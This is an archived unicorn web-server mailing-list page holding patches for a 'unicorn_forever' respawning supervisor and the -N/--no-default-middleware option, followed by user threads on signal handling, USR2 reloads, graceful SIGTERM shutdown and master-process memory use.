+  # to retry, and +:delay+ may be specified as the time in seconds
+  # to delay between retries.
+  # A negative value for +:tries+ indicates the listen will be
+  # retried indefinitely, this is useful when workers belonging to
+  # different masters are spawned during a transparent upgrade.
+  def listen(address, opt = {}.merge(listener_opts[address] || {}))
+    address = config.expand_addr(address)
+    return if String === address && listener_names.include?(address)
+
+    delay = opt[:delay] || 0.5
+    tries = opt[:tries] || 5
+    begin
+      io = bind_listen(address, opt)
+      unless Kgio::TCPServer === io || Kgio::UNIXServer === io
+        IO_PURGATORY << io
+        io = server_cast(io)
+      end
+      @logger.info "listening on addr=#{sock_name(io)} fd=#{io.fileno}"
+      @listeners << io
+      io
+    rescue Errno::EADDRINUSE => err
+      @logger.error "adding listener failed addr=#{address} (in use)"
+      raise err if tries == 0
+      tries -= 1
+      @logger.error "retrying in #{delay} seconds " \
+                    "(#{tries < 0 ? 'infinite' : tries} tries left)"
+      sleep(delay)
+      retry
+    rescue => err
+      @logger.fatal "error adding listener addr=#{address}"
+      raise err
+    end
+  end
+
+  # reaps all unreaped processes
+  def reap_all
+    begin
+      pid, status = Process.waitpid2(-1, Process::WNOHANG)
+      pid or return
+      @logger.error "reaped #{status.inspect}"
+      @exec_pid = nil if pid == @exec_pid
+    rescue Errno::ECHILD
+      break
+    end while true
+  end
+
+  # Monitors child and receives signals forever (or until SIGKILL is sent).
+  # This handles signals one at a time.
+  # Send SIGSTOP to this process to prevent it from respawning
+  def join
+    begin
+      IO.select([@self_pipe[0]])
+      @self_pipe[0].kgio_tryread(11)
+      reap_all
+      sig = @sig_queue.shift
+
+      case sig
+      when nil # spurious wakeup
+      when :USR1 # rotate logs
+        @logger.info "unicorn-forever reopening logs..."
+        Unicorn::Util.reopen_logs
+        @logger.info "unicorn-forever done reopening logs"
+
+        # this is the only signal we always forward
+        Process.kill(sig, @exec_pid) if @exec_pid
+      when :HUP
+        # we only implement SIGHUP because we need to be aware of new
+        # sockets from updated configs
+        if @config.config_file
+          load_config!
+        else # exec binary and exit if there's no config file
+          @logger.info "SIGHUP received but config file not defined"
+        end
+      else
+        @logger.info "unhandled signal: SIG#{sig} received"
+        zero = START_CTX[:argv][0]
+        if @exec_pid
+          @logger.info("did you mean to signal `#{zero}' at PID:#@exec_pid?")
+        else
+          @logger.info("`#{zero}' not running")
+        end
+      end
+      unless @exec_pid
+        do_exec
+
+        # throttle, in case the master keeps dying, we don't want to burn
+        # cycles and fill up logs by constant respawning
+        sleep 1
+      end
+    rescue => e
+      Unicorn.log_error(@logger, "forever loop error", e)
+    end while true
+    # We don't go down easily, use SIGKILL
+  end
+
+  def sig_handler(s)
+    @sig_queue << s
+    @self_pipe[1].kgio_trywrite('^') # wakeup ourselves from IO.select
+  end
+
+  def do_exec
+    @exec_pid = fork do # This will become the unicorn master process
+      # Don't let actions on any TTY unicorn_forever may have influence us
+      Process.setsid
+
+      listener_fds = Hash[@listeners.map do |sock|
+        # IO#close_on_exec= will be available on any future version of
+        # Ruby that sets FD_CLOEXEC by default on new file descriptors
+        # ref: http://redmine.ruby-lang.org/issues/5041
+        sock.close_on_exec = false if sock.respond_to?(:close_on_exec=)
+        [ sock.fileno, sock ]
+      end]
+      ENV['UNICORN_FD'] = listener_fds.keys.join(',')
+      Dir.chdir(START_CTX[:cwd])
+      cmd = START_CTX[:argv]
+
+      # avoid leaking FDs we don't know about, but let before_exec
+      # unset FD_CLOEXEC, if anything else in the app eventually
+      # relies on FD inheritance.
+      (3..1024).each do |io|
+        next if listener_fds.include?(io)
+        io = IO.for_fd(io) rescue next
+        IO_PURGATORY << io
+        io.fcntl(Fcntl::F_SETFD, Fcntl::FD_CLOEXEC)
+      end
+
+      # exec(command, hash) works in at least 1.9.1+, but will only be
+      # required in 1.9.4/2.0.0 at earliest.
+      cmd << listener_fds if RUBY_VERSION >= "1.9.1"
+      @logger.info "executing #{cmd.inspect} (in #{Dir.pwd})"
+      exec(*cmd)
+    end
+  end
+
+  def load_config!
+    @logger.info "reloading config_file=#{@config.config_file}"
+    @config[:listeners].replace(@init_listeners)
+    @config.reload
+    @config.commit!(self)
+    Unicorn::Util.reopen_logs
+    @logger.info "done reloading config_file=#{@config.config_file}"
+  rescue StandardError, LoadError, SyntaxError => e
+    Unicorn.log_error(@logger,
+        "error reloading config_file=#{@config.config_file}", e)
+  end
+
+  # returns an array of string names for the given listener array
+  def listener_names(listeners = @listeners)
+    listeners.map { |io| sock_name(io) }
+  end
+
+  def redirect_io(io, path)
+    File.open(path, 'ab') { |fp| io.reopen(fp) } if path
+    io.sync = true
+  end
+
+  # This binds any listeners we did NOT inherit from the parent
+  def bind_new_listeners!
+    @new_listeners.each { |addr| listen(addr) }
+    raise ArgumentError, "no listeners" if @listeners.empty?
+    @new_listeners.clear
+  end
+end
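
For reference, driving a running -forever process from an operator's
point of view might look like the following rough sketch (the
forever.pid path below is a hypothetical example, not something this
patch creates):

   # hypothetical sketch; 'forever.pid' is an assumed path
   forever_pid = Integer(File.read('forever.pid'))
   Process.kill(:USR1, forever_pid) # reopen logs (forwarded to the master)
   Process.kill(:HUP,  forever_pid) # reload config, pick up new listeners
   Process.kill(:STOP, forever_pid) # pause respawning of a dead master
   Process.kill(:CONT, forever_pid) # resume respawning
   Process.kill(:KILL, forever_pid) # the only way to make -forever exit
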
-- 
Eric Wong

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 1%]

* Re: [PATCH 1/2] Integration test for --no-default-middleware option
  @ 2013-06-07  9:25  2% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-06-07  9:25 UTC (permalink / raw)
  To: unicorn list; +Cc: Micah Chalmer

Micah Chalmer <micah@micahchalmer.net> wrote:
> This adds an integration test to ensure that the -N option
> continues to function as documented.

Thanks for this fix.  To avoid breaking bisection, I always keep
previously-failing test cases in the same commit as the fix, so I'll
squash your commits together.

Your 2/2 came whitespace mangled, too.  The git-format-patch(1) manpage
has info for popular mailers, and git also comes with a 'send-email'
command for use in conjunction with 'format-patch'.

> +++ b/t/t0300-no-default-middleware.sh
> @@ -0,0 +1,15 @@
> +#!/bin/sh
> +. ./test-lib.sh
> +t_plan 2 "test the -N / --no-default-middleware option"
> +
> +t_begin "setup and start" && {
> +    unicorn_setup
> +    unicorn -N -D -c $unicorn_config fails-rack-lint.ru
> +    unicorn_wait_start

Existing integration tests use hard tabs for indentation, so I'll update
your patch to match on my end (my personal preference is
hard tabs, especially for non-Ruby languages).

I'll push out the following unless you have objections:

--------------------------------8<----------------------------------
From: Micah Chalmer <micah@micahchalmer.net>
Subject: [PATCH] Make -N/--no-default-middleware option work

This fixes the -N (a.k.a. --no-default-middleware) option, which
was not working.  The problem was that Unicorn::Configurator::RACKUP
is cleared before the lambda returned by Unicorn.builder is run,
which means that checking whether the :no_default_middleware option
was set from the lambda could not detect anything.  This patch copies
it to a local variable that won't get clobbered, restoring the feature.
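
A minimal sketch of the problem (made-up variable names, not unicorn's
actual code):

    opts = { :no_default_middleware => true }
    lazy = lambda { opts[:no_default_middleware] } # reads the hash when called
    saved = opts[:no_default_middleware]
    eager = lambda { saved }                       # captures the value up front
    opts.clear       # what happens to Configurator::RACKUP before the call
    lazy.call  # => nil, the option appears unset
    eager.call # => true, still correct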

[ew: squashed test commit into the fix, whitespace fixes]

Signed-off-by: Eric Wong <normalperson@yhbt.net>
---
 lib/unicorn.rb                   |  6 +++++-
 t/fails-rack-lint.ru             |  5 +++++
 t/t0300-no-default-middleware.sh | 15 +++++++++++++++
 3 files changed, 25 insertions(+), 1 deletion(-)
 create mode 100644 t/fails-rack-lint.ru
 create mode 100644 t/t0300-no-default-middleware.sh

diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index f0ceffe..2535159 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -35,6 +35,10 @@ module Unicorn
     # allow Configurator to parse cli switches embedded in the ru file
     op = Unicorn::Configurator::RACKUP.merge!(:file => ru, :optparse => op)
 
+    # Op is going to get cleared before the returned lambda is called, so
+    # save this value so that it's still there when we need it:
+    no_default_middleware = op[:no_default_middleware]
+
     # always called after config file parsing, may be called after forking
     lambda do ||
       inner_app = case ru
@@ -49,7 +53,7 @@ module Unicorn
 
       pp({ :inner_app => inner_app }) if $DEBUG
 
-      return inner_app if op[:no_default_middleware]
+      return inner_app if no_default_middleware
 
       # return value, matches rackup defaults based on env
       # Unicorn does not support persistent connections, but Rainbows!
diff --git a/t/fails-rack-lint.ru b/t/fails-rack-lint.ru
new file mode 100644
index 0000000..82bfb5f
--- /dev/null
+++ b/t/fails-rack-lint.ru
@@ -0,0 +1,5 @@
+# This rack app returns an invalid status code, which will cause
+# Rack::Lint to throw an exception if it is present.  This
+# is used to check whether Rack::Lint is in the stack or not.
+
+run lambda {|env| return [42, {}, ["Rack::Lint wasn't there if you see this"]]}
diff --git a/t/t0300-no-default-middleware.sh b/t/t0300-no-default-middleware.sh
new file mode 100644
index 0000000..c017c16
--- /dev/null
+++ b/t/t0300-no-default-middleware.sh
@@ -0,0 +1,15 @@
+#!/bin/sh
+. ./test-lib.sh
+t_plan 2 "test the -N / --no-default-middleware option"
+
+t_begin "setup and start" && {
+	unicorn_setup
+	unicorn -N -D -c $unicorn_config fails-rack-lint.ru
+	unicorn_wait_start
+}
+
+t_begin "check exit status with Rack::Lint not present" && {
+	test 42 -eq "$(curl -sf -o/dev/null -w'%{http_code}' http://$listen/)"
+}
+
+t_done
-- 
Eric Wong

_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply related	[relevance 2%]

* Re: Growing memory use of master process
  @ 2013-05-15 10:35  3%         ` Lin Jen-Shin (godfat)
  0 siblings, 0 replies; 200+ results
From: Lin Jen-Shin (godfat) @ 2013-05-15 10:35 UTC (permalink / raw)
  To: unicorn list

On Wed, May 15, 2013 at 6:22 PM, Andrew Stewart
<boss@airbladesoftware.com> wrote:
> I wonder whether New Relic could be doing this.  I don't really know how
> New Relic works but the language in its configuration file suggests it
> polls each app process in the background.
>
> It would be interesting to hear what other New Relic users observe
> happening to their master process's memory footprint.

We're running on Heroku and also using NewRelic. According to my
observation, the master process is quite stable, staying roughly the
same memory footprint within 24 hours. (Heroku auto-restarts each
process each day, so I don't know what would happen after 24 hours)

We're using preload_app=true as well.

As far as I know, NewRelic's agent is running in each worker process,
but does nothing in the master process. (only a wild guess, I didn't read
the code there)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 3%]

* Re: Unicorn_rails ignores USR2 signal
  @ 2013-05-08 18:15  2%                       ` Ryan Jones (RyanonRails)
  0 siblings, 0 replies; 200+ results
From: Ryan Jones (RyanonRails) @ 2013-05-08 18:15 UTC (permalink / raw)
  To: mongrel-unicorn

We've run into the exact same problem. We spent a few good solid hours trying to
fix the problem to no avail (but we do have a 'solution').

Server specs:
Ubuntu 12.04.2 LTS (GNU/Linux 3.5.0-27-generic x86_64)

Rails & Ruby:
Rails 4.0.0.beta1
Ruby 2.0.0p0 (2013-02-24 revision 39474) [x86_64-linux]
Unicorn 4.6.2 - preload_app true
Capistrano

The first thing we tried was removing all of the gems (foreman, sidekiq, etc.)
and that didn't work. We tried preload_app false, and that worked (but this is
not the situation we want). We also tried searching for any gems that were
capturing USR2 (or any signals in general).

We tried monkey patching Kernel & Trap to see if we could pinpoint the problem,
but that didn't seem to turn up much. We then jumped in unicorn's http_server.rb
and threw in some logging. The only thing that seemed to show us was that USR2
was unable to get through to unicorn. Signals HUP, QUIT, etc. all worked fine
(and made their way through as per norm).

We then fired up strace with unicorn to see if we could 'see' the USR2 signal.
It looks almost identical to Jeffrey's strace: the USR2 signal appears to be
received by the process, but then dropped (or ignored). If we pass it a QUIT
signal it works just fine and we can see that in the strace.

So here's the chain of events that we think is occurring:

1. We start unicorn (a unicorn blessing)
2. before_fork is triggered (Signal trapping works here)
3. A unicorn is born (Signal trapping does not work here)
4. The after fork is triggered

In our situation, once a unicorn is born, it can no longer receive a USR2 (for
whatever reason). We never actually checked to see if the after fork received a
USR2.
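
For what it's worth, a standalone sketch (independent of unicorn and our
app) to check whether a freshly forked child still sees USR2 could look
like this:

    trap(:USR2) { warn "parent #{$$} got USR2" }
    pid = fork do
      trap(:USR2) { warn "child #{$$} got USR2" }
      sleep 5
    end
    sleep 0.5                # give the child time to install its trap
    Process.kill(:USR2, pid) # expect the child line on stderr
    Process.waitpid(pid)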

After we traced the path of execution, we figured out a quick fix: we call
the reexec method directly on the unicorn server in the
before_fork block in unicorn.rb. Here's our unicorn.rb
https://gist.github.com/RyanonRails/5541902

----- snip -----

before_fork do |server, worker|
  Signal.trap 'USR2' do
    puts 'Since a black hole is lurking and eating USR2s we will hit http_server#reexec ourselves'
    server.send(:reexec)
  end
end
----- snip -----

This way we can actually force the USR2 directly on the server (since USR2 is
available inside of the before_fork).

This seems to be working well for us now. We're still frustrated that we weren't
able to find the cause of the problem, but at least we can move forward (with
minor disruption to the code/code base).

Lastly, here are our current theories as to why this could be occurring:
1. When unicorn is building its native extensions, something weird is happening
in regards to the USR2 signal
2. A gem is somehow gobbling up the signal (we were quite thorough, but we
might've missed something)

Hopefully this helps!

Thanks,
Ryan & Mike


_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

* Re: Why doesn't SIGTERM quit gracefully?
  2013-04-25 11:02  2%   ` Andreas Falk
@ 2013-04-25 18:09  0%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2013-04-25 18:09 UTC (permalink / raw)
  To: unicorn list; +Cc: Andreas Falk

Andreas Falk <mail@andreasfalk.se> wrote:
> On Thu, Apr 25, 2013 at 10:51 AM, Eric Wong <normalperson@yhbt.net> wrote:
> > Andreas Falk <mail@andreasfalk.se> wrote:
> >> I'm wondering why SIGINT and SIGTERM both were chosen for the quick
> >> shutdown? I agree with SIGINT but not with SIGTERM. A lot of unix
> >> tools send SIGTERM as default (kill, runit among some) and it seems to
> >> be the standard way of telling a process to quit gracefully but not
> >> among Ruby people (there are a few other ruby processes behaving the
> >> same way). I just think it's weird that the default command will exit
> >> without taking care of their current request.
> >>
> >> Also i'm not on the mailinglist so it would be great if you could cc
> >> mail@andreasfalk.se
> >
> > I think it's weird, too.  But that's what nginx does, and I based most
> > of the UI decisions on nginx (so it's easy to reuse nginx scripts
> > with unicorn).
> 
> Is it something you'd be willing to change?

If nginx developers are willing to change this, definitely.

Otherwise, at this point, I'm not certain what the ramifications of a
change would be to existing users.  Maybe an option would work, but too
many options overwhelms people.

With unicorn, I suppose having the following after_fork hook works:

   # Note: after_fork hook is run before the :QUIT handler is installed,
   # so we can't use the result of trap(:QUIT) at this point:
   after_fork do |server,worker|
     trap(:TERM) { Process.kill(:QUIT, $$) }
   end

If I had to do this all over again[1], graceful shutdown would be the
_only_ option.

[1] - I haven't released a new web server for 2013... yet :)
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 0%]

* Re: Why doesn't SIGTERM quit gracefully?
  @ 2013-04-25 11:02  2%   ` Andreas Falk
  2013-04-25 18:09  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Andreas Falk @ 2013-04-25 11:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn list

On Thu, Apr 25, 2013 at 10:51 AM, Eric Wong <normalperson@yhbt.net> wrote:
> Andreas Falk <mail@andreasfalk.se> wrote:
>> I'm wondering why SIGINT and SIGTERM both were chosen for the quick
>> shutdown? I agree with SIGINT but not with SIGTERM. A lot of unix
>> tools send SIGTERM as default (kill, runit among some) and it seems to
>> be the standard way of telling a process to quit gracefully but not
>> among Ruby people (there are a few other ruby processes behaving the
>> same way). I just think it's weird that the default command will exit
>> without taking care of their current request.
>>
>> Also i'm not on the mailinglist so it would be great if you could cc
>> mail@andreasfalk.se
>
> I think it's weird, too.  But that's what nginx does, and I based most
> of the UI decisions on nginx (so it's easy to reuse nginx scripts
> with unicorn).

Is it something you'd be willing to change? The developers behind
resque reasoned in a similar way in regards to nginx but changed it
after a while. You can read more about it here
<https://github.com/resque/resque/issues/368> and in the referenced
issues.

The change I'd like to see is preferably to have SIGTERM and SIGQUIT
swap places, but at least to move SIGTERM to do the same thing as SIGQUIT
does now (graceful exit).

I may be wrong, but I feel that the change shouldn't completely break
anything (since it would still exit, just take a bit longer) and
switching some signals around in the nginx scripts shouldn't be that
much work? Also some people are probably using SIGINT already and
wouldn't be affected. I think the benefit in the long run of being in
line with the "standard" outweighs the hassle of converting a few
scripts.

Also perhaps with some luck the nginx developers will pick up on the
changes in other software and switch theirs around too!

Thanks for a really great tool anyway!

Andreas
_______________________________________________
Unicorn mailing list - mongrel-unicorn@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-unicorn
Do not quote signatures (like this one) or top post when replying

^ permalink raw reply	[relevance 2%]

Results 1-200 of ~560   | reverse | options above
-- pct% links below jump to the message on this page, permalinks otherwise --
2012-03-09 21:48     Unicorn_rails ignores USR2 signal Yeung, Jeffrey
2012-03-09 22:24     ` Eric Wong
2012-03-09 22:39       ` Yeung, Jeffrey
2012-03-10  0:02         ` Eric Wong
2012-03-10  1:07           ` Yeung, Jeffrey
2012-03-10  1:30             ` Eric Wong
2012-03-12 21:21               ` Eric Wong
2012-03-12 22:39                 ` Yeung, Jeffrey
2012-03-12 22:44                   ` Eric Wong
2012-03-20 19:57                     ` Eric Wong
2012-03-30 22:16                       ` Yeung, Jeffrey
2012-03-30 22:51                         ` Alex Sharp
2013-05-08 18:15  2%                       ` Ryan Jones (RyanonRails)
2013-04-25  8:02     Why doesn't SIGTERM quit gracefully? Andreas Falk
2013-04-25  8:51     ` Eric Wong
2013-04-25 11:02  2%   ` Andreas Falk
2013-04-25 18:09  0%     ` Eric Wong
2013-05-15  8:52     Growing memory use of master process Andrew Stewart
2013-05-15  9:28     ` Eric Wong
2013-05-15  9:38       ` Andrew Stewart
2013-05-15  9:57         ` Eric Wong
2013-05-15 10:22           ` Andrew Stewart
2013-05-15 10:35  3%         ` Lin Jen-Shin (godfat)
2013-06-07  3:03     [PATCH 1/2] Integration test for --no-default-middleware option Micah Chalmer
2013-06-07  9:25  2% ` Eric Wong
2013-07-24  3:11  1% [PATCH] unicorn_forever: new executable to respawn masters Eric Wong
2013-08-20 14:47     A barrage of unexplained timeouts nick
2013-08-20 16:37     ` Eric Wong
2013-08-20 17:27       ` nick
2013-08-20 17:40         ` Eric Wong
2013-08-20 18:11  3%       ` nick
2013-08-20 18:49  0%         ` Eric Wong
2013-08-20 20:03  0%           ` nick
2013-08-23  1:34     Ruby 2.0 Bad file descriptor (Errno::EBADF) Port Himmerland
2013-08-23  2:04     ` Eric Wong
2013-08-23  6:21       ` port
2013-08-23  6:47         ` Eric Wong
2013-09-04 19:00  3%       ` Eric Chapweske
2013-09-04 19:29  0%         ` Eric Wong
2013-09-20 21:40     [PATCH] preload_app can take an optional block for warmup Aman Gupta
2013-09-21  8:49  3% ` Eric Wong
2013-09-21 23:10  0%   ` Aman Gupta
2013-09-23 10:58  0%     ` Eric Wong
2013-09-24 16:02     IOError: closed stream David Judd
2013-09-26 22:31  2% ` David Judd
2013-10-23 22:55     pid file handling issue Michael Fischer
2013-10-24  0:53     ` Eric Wong
2013-10-24  1:01       ` Michael Fischer
2013-10-24  2:03  3%     ` Eric Wong
2013-10-24 17:51  0%       ` Michael Fischer
2013-10-24 18:21  3%         ` Eric Wong
2013-10-24 19:57  0%           ` Michael Fischer
2013-10-25 20:34  7% [PATCH] support SO_REUSEPORT on new listeners (:reuseport) Eric Wong
2013-10-25 20:49  2% ` Eric Wong
2013-10-26  7:58 10% [PATCH] license: allow all future versions of the GNU GPL Eric Wong
2013-11-04  7:57  2% [ANN] unicorn 4.7.0 - minor updates, license tweak Eric Wong
2013-11-21 10:58  3% Best way to deploy an internal Rack app? Andrew Stewart
2013-11-21 17:22  0% ` Eric Wong
2013-11-26  1:00     Issues with PID file renaming Jimmy Soho
2013-11-26  1:20     ` Eric Wong
2013-12-10 12:46       ` Petteri Räty
2013-12-10 19:52  3%     ` Eric Wong
2013-12-10 22:44  3%       ` Petteri Räty
2013-12-11 13:54  0%         ` Michael Fischer
2013-12-12 19:15  3%           ` Petteri Räty
2013-12-12 20:51  0%             ` Eric Wong
2013-12-09  9:52  2% [PATCH] rework master-to-worker signaling to use a pipe Eric Wong
2013-12-10  0:22  0% ` Sam Saffron
2014-01-15 11:37  3% Suggestion for Named Process Bob McKinven
2014-01-15 18:19  0% ` Eric Wong
2014-01-24 11:21  2% Unicorn workers freeze from time to time Artem Pyanykh
2014-04-15  8:00  3% Workers reaped with SIGABRT - how to debug? Henrik Nyh
2014-04-15  8:43  0% ` Eric Wong
2014-04-15  9:05       ` Henrik Nyh
2014-04-15 10:34  3%     ` Aaron Suggs
2014-04-16  7:08  0%     ` Henrik Nyh
2014-04-28  9:25  0% ` Henrik Nyh
2014-04-23  1:21     Is there a cleaner way of hooking into the event loop? Sam Saffron
2014-04-23  1:30  3% ` Michael Fischer
2014-04-23  2:04  0%   ` Sam Saffron
2014-04-26  3:20     [PATCH] tests: switch to minitest Ken Dreyer
2014-04-26  6:07     ` Eric Wong
2014-05-13  0:46       ` Ken Dreyer
2014-05-13  1:13  2%     ` Eric Wong
2014-04-30 13:54     Does unicorn waits after_work to consider a worker ready? Bráulio Bhavamitra
2014-05-01  1:33     ` Eric Wong
2014-05-01 15:23       ` Bráulio Bhavamitra
2014-05-01 18:18         ` Eric Wong
2014-05-01 19:00  2%       ` Bráulio Bhavamitra
2014-05-07  8:05     [ANN] unicorn 4.8.3 - the end of an era Eric Wong
2014-05-07  9:30     ` Jérémy Lecour
2014-05-07  9:46       ` Eric Wong
2014-05-07 10:16         ` Lin Jen-Shin (godfat)
2014-05-07 10:52  3%       ` Alejandro Riera
2014-05-07 19:54  0%         ` handling SMTP subscribers to public-inboxen Eric Wong
2014-05-08  8:43  2% subscription to new ML probably working Eric Wong
2014-08-02  7:51     Please move to github Gary Grossman
2014-08-02  8:50     ` Eric Wong
2014-08-02 19:07       ` Gary Grossman
2014-08-02 20:15  3%     ` Eric Wong
2014-08-04 18:12  2% Weird Unicorn Timeout Issues (Hibernation problem?) Tony Devlin
2014-08-04 18:39     ` Eric Wong
2014-08-04 18:55       ` Daniel Condomitti
2014-08-04 19:34         ` Eric Wong
2014-08-04 20:24           ` Tony Devlin
2014-08-04 20:44             ` Eric Wong
2014-08-04 20:46               ` Eric Wong
2014-08-05 14:46  2%             ` Tony Devlin
2014-09-22  1:05     [PATCH 0/4] a few more minor cleanups pushed out Eric Wong
2014-09-22  1:05 10% ` [PATCH 2/4] remove mongrel.rubyforge.org references Eric Wong
2014-09-22  1:05 10% ` [PATCH 3/4] http: remove the keepalive requests limit Eric Wong
2014-09-22  1:05 12% ` [PATCH 4/4] http: reduce parser from 72 to 56 bytes on 64-bit Eric Wong
2014-10-03 11:34     Master hooks needed Bráulio Bhavamitra
2014-10-03 12:22     ` Eric Wong
2014-10-03 12:36       ` Valentin Mihov
2014-10-03 17:50         ` Eric Wong
2014-10-03 18:12  3%       ` Valentin Mihov
2014-10-06 15:04     Unicorn not working in GitLab 7.3 Onno van der Straaten
2014-10-06 15:07  3% ` Onno van der Straaten
2014-10-07  5:08  0%   ` Eric Wong
2014-10-09 12:24     Reserved workers not as webservers Bráulio Bhavamitra
2014-10-09 16:45  3% ` Michael Fischer
2014-10-09 17:14  0%   ` Devin Ben-Hur
2014-10-09 18:29  0%     ` Bráulio Bhavamitra
2014-10-09 17:43  0%   ` Bráulio Bhavamitra
2014-10-09 17:59  3%     ` Michael Fischer
2014-10-09 18:01  0%       ` Bráulio Bhavamitra
2014-10-24 17:33     Having issue with Unicorn Imdad
2014-10-24 17:45     ` Eric Wong
2014-10-24 18:02  1%   ` Imdad
2014-10-24 18:13  0%     ` Eric Wong
2014-10-24 18:28  0%       ` Imdad
2014-10-24 18:34             ` Eric Wong
2014-10-24 18:39               ` Imdad
2014-10-24 19:13                 ` Eric Wong
2014-10-24 19:29                   ` Imdad
2014-10-24 19:41                     ` Eric Wong
2014-10-24 19:58                       ` Imdad
2014-10-24 20:06                         ` Eric Wong
2014-10-24 20:09  3%                       ` Imdad
2014-10-24 20:17  0%                         ` Eric Wong
2014-10-24 20:35  0%                           ` Imdad
2014-10-24 20:39  0%                             ` Imdad
2014-11-14  7:19     Issue with Unicorn: Big latency when getting a request Eric Wong
2014-11-14  9:09     ` Roberto Cordoba del Moral
2014-11-14  9:32       ` Roberto Cordoba del Moral
2014-11-14 10:02         ` Eric Wong
2014-11-14 10:12           ` Roberto Cordoba del Moral
2014-11-14 10:15             ` Roberto Cordoba del Moral
2014-11-14 10:28               ` Eric Wong
2014-11-14 10:51                 ` Roberto Cordoba del Moral
2014-11-14 11:03                   ` Eric Wong
2014-11-14 15:01                     ` Roberto Cordoba del Moral
2014-11-14 18:34                       ` Eric Wong
2014-11-14 22:36  3%                     ` Roberto Cordoba del Moral
2014-12-30 16:38     Unicorn workers timing out intermittently Aaron Price
2014-12-30 18:12  0% ` Eric Wong
2014-12-30 20:02  0%   ` Aaron Price
2015-02-04 20:16  2% [PATCH] http: standalone require + reduction in binary size Eric Wong
2015-02-06 20:15  3% [PATCH] doc: update support status for Ruby versions Eric Wong
2015-02-06 22:17  4% [PATCH] fix uninstalled testing and reduce require paths Eric Wong
2015-02-09  9:12     [PATCH 1/2] const: drop constants used by Rainbows! Eric Wong
2015-02-09  9:12  6% ` [PATCH 2/2] reduce and localize constant string use Eric Wong
2015-02-10 17:06  6% [PATCH] ISSUES: add section for bugs in other projects Eric Wong
2015-02-10 17:26 14% ` Eric Wong
2015-02-12 19:09  8% [PATCH] http_server: favor ivars over constants Eric Wong
2015-02-16  2:19  4% Bug, Unicorn can drop signals in extreme conditions Steven Stewart-Gallus
2015-02-18  9:15  0% ` Eric Wong
2015-03-03 22:24     Request Queueing after deploy + USR2 restart Sarkis Varozian
2015-03-03 22:32     ` Michael Fischer
2015-03-04 19:48  3%   ` Sarkis Varozian
2015-03-04 19:51  0%     ` Michael Fischer
2015-03-04 19:58  0%       ` Sarkis Varozian
2015-03-04 20:17  0%         ` Michael Fischer
2015-03-04 20:24  0%           ` Sarkis Varozian
2015-03-04 20:27  0%             ` Michael Fischer
2015-03-04 20:35                 ` Eric Wong
2015-03-04 20:40                   ` Sarkis Varozian
2015-03-05 17:07                     ` Sarkis Varozian
2015-03-05 17:13                       ` Bráulio Bhavamitra
2015-03-05 17:28  3%                     ` Sarkis Varozian
2015-03-05 17:31  0%                       ` Bráulio Bhavamitra
2015-03-05 17:32  0%                       ` Bráulio Bhavamitra
2015-03-12  1:04  5% On USR2, new master runs with same PID Kevin Yank
2015-03-12  1:45 10% ` Eric Wong
2015-03-12  6:26  8%   ` Kevin Yank
2015-03-12  6:45  7%     ` Eric Wong
2015-03-20  1:55  8%       ` Kevin Yank
2015-03-20  1:58  8%       ` Kevin Yank
2015-03-20  2:08  8%         ` Eric Wong
2015-03-24 22:43     nginx reverse proxy getting ECONNRESET Michael Fischer
2015-03-24 22:54  3% ` Eric Wong
2015-03-24 22:59       ` Eric Wong
2015-03-24 23:04         ` Michael Fischer
2015-03-24 23:23           ` Eric Wong
2015-03-24 23:29             ` Michael Fischer
2015-03-24 23:46               ` Eric Wong
2015-03-24 23:55                 ` Eric Wong
2015-03-25  9:41                   ` Michael Fischer
2015-03-25 10:12  3%                 ` Eric Wong
2015-03-27 14:32  3% $USER and $HOME shell variables not set Russell Jennings
2015-03-27 18:34  0% ` Eric Wong
2015-04-22 16:42     TeeInput leaks file handles/space Mulvaney, Mike
2015-04-22 18:38  2% ` Eric Wong
2015-04-22 19:10  2%   ` Mulvaney, Mike
2015-04-22 19:16         ` Eric Wong
2015-04-22 19:24  2%       ` Mulvaney, Mike
2015-04-24  3:08  0%         ` Eric Wong
2015-04-24 11:56  0%           ` Mulvaney, Mike
2015-04-23  9:05     Unicorn, environment variables, start and reload Jérémy Lecour
2015-04-23  9:29  2% ` Eric Wong
2015-05-07 22:16  2% [PATCH] favor kgio_wait_readable for single FD over select Eric Wong
2015-06-06  1:58     [PATCH 0/2] eliminate generic ivars from HttpRequest class Eric Wong
2015-06-06  1:58  2% ` [PATCH 2/2] http: move response_start_sent into the C ext Eric Wong
2015-06-15 22:56     [ANN] unicorn 5.0.0.pre1 - incompatible changes! Eric Wong
2015-07-06 21:41  3% ` [ANN] unicorn 5.0.0.pre2 - another prerelease! Eric Wong
2015-06-26 19:46  2% TAN: Ragel now maintained by Colm networks Eric Wong
2015-06-26 21:03  0% ` Bráulio Bhavamitra
2015-07-01 16:08     Unicorn returns blank page after no use Farjad Adamjee
2015-07-01 17:30  2% ` Eric Wong
2015-07-15 22:05  2% [PATCH] doc: remove references to old servers Eric Wong
2015-09-29  6:38     Request to follow SemVer/mention it in homepage Pirate Praveen
2015-09-29  7:36     ` Eric Wong
2015-09-29  9:26  3%   ` Jérémy Lecour
2015-09-29 19:43  0%     ` Eric Wong
2015-10-14 20:12  2% unicorn non-technical FAQ Eric Wong
2015-11-13  0:51     Shared Metrics Between Workers Jeff Utter
